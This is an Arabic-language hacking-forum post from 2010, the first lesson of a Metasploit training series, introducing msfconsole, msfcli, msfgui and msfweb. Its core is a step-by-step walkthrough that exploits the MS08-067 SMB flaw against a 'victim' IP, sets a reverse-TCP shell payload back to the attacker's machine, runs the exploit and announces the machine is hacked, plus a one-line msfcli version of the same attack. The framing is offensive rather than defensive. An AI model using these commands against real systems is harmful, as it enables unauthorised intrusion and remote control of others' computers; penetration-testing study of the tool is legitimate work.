module 1 : ماهي msfconsole,msfcli,msfweb,msfgui و نبذة عن الأوامر .(METASPLOIT TRANNING)

data$hack · 02-03-2010, 01:48 AM

السلام عليكم ورحمة الله وبركاته
بسم الله الرحمن الرحيم

في هذا الدرس :
ستتعرف msfconsole واوامره , كيفية العمل به
ستتعرف msfcli
ستتعرف msfgui
ستتعرف msfweb

مشروع Metasploit مشروع كبير جدا و مشهور عالميا ، بدايته كانت سنة 2003 , كان يحتوي على القليل من exploits و payloads , فبدأت عملية التطور ليصل اليوم محملا ب 496 exploits و 192 payloads و 239 auxiliary. بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow ... و الكثير الكثير

سنتحدث اكثر عن msfconsole
تعريف صغير عن البقية

-----------------------
msfconsole
-----------------------
تجدونها على باك تراك هنا :

كود PHP:

  pentest/exploits/framework3/msfconsole

ندخل الان في الاوامر :
اهم امر help
لن اشرحو هههه

امر show :

show exploits
اظهار جميع الثغرات

show payloads
اظهار جميع payload

show auxiliary
اظهار جميع auxiliary

search
للبحث ;مثال :

امر info
تعطينا معلومات ;مثال :

امر use
احنا عندنا ثغرة نريد استخدامها ،
اذا use ;مثال :

كود PHP:

  msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

اكتب show options لترى options الثغرة ;مثال :

ماذا يهمنا هنا ???
الظحية rhost
rport البورت المصاب اتركه كما هو
نظع ip الظحية set RHOST ip ;مثال :

كود PHP:

  msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
RHOST => 192.168.1.2

الان نأتي الى المهم ال payload
باختصار هو كيفية التحكم بجهاز victim
اكتب show payloads من ثم اختر واحدا
باختصار هذه ال payload هي الاقوى :

كود PHP:

  windows/shell/reverse_tcp
windows/shell/bind_tcp
windows/vncinject/bind_tcp
windows/meterpreter/reverse_tcp

سنأتي على تعريفها في الدروس القادمة

نظع ال set payload :::payload ;مثال :

كود PHP:

  msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

اكتب show options لترى options الثغرة again ;مثال :

هههه كبرت
شوف lhost تظع هنا ال ip تبعك ;مثال :

كود PHP:

  msf exploit(ms08_067_netapi) > set LHOST 192.168.1.3
LHOST => 192.168.1.3

كل شيء تمام

الان اكتب exploit للاستغلال ;مثال :

:icon555: :00001793[1]:

تم الاخترق

ملا حظة هامة جدا
انا استعملت ثغرة windows/smb/ms08_067_netapi
يعني انت ممكن تمشي معاك ممكن لا
استعمل ما تعلمته قبل قليل للبحث عن ثغرة تعمل
ان شاء الله استفدتوووا

-----------------------
msfcli
-----------------------

باختصار هيا للاختصار
مثال :

كود PHP:

  /pentest/exploits/framework3/msfcli windows/smb/ms08_067_netapi payload=windows/shell/reverse_tcp RHOST=192.168.1.2 LHOST=192.168.1.2 E

-----------------------
msfgui
-----------------------
للاغبياء فقط :icon666:
تشغيلها سهل :

كود PHP:

  pentest/exploits/framework3/msfgui

-----------------------
msfweb
-----------------------
الاجمل و الاروع :666:
تشغيلها سهل :

كود PHP:

  pentest/exploits/framework3/msfweb

ثم اذهب للمتصفح :

كود PHP:

  http://127.0.0.1:55555/

ان شاء الله اكون وصلت بعض المعلومات و لو القليل
ان شاء الله بتفهم اكثر مع الدروس القادمة
ارجوا من اصحاب القلوب المريضة حفض الحقوق والله تعبت عليه
best regards
data$hack

المصدر: :: vBspiders Professional Network ::

module 1 : lhid msfconsole(METASPLOIT TRANNING)

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
::: METASPLOIT TRANNING ::: مقدمة , توضيحات و فهرس	data$hack	MetaSploit	212	04-26-2015 11:09 PM
[اول درس]نبذة عن الميتاسبلويت	المجهووول	MetaSploit	28	03-22-2012 01:09 AM
module 4 : ال [METERPRETER]. =>>>>>> الدرس 1 : نبذة عن الاوامر	data$hack	MetaSploit	100	01-29-2011 11:45 PM
شرح أداة الـ msfcli داخل الميتاسبلويت عوضا عن الكونسول والواجهة الرسومية	MATRIX ALGERIA	جـــ'ابات العناكــ'ب	6	04-28-2010 08:28 PM

module 1 : ماهي msfconsole,msfcli,msfweb,msfgui و نبذة عن الأوامر .(METASPLOIT TRANNING)

MetaSploit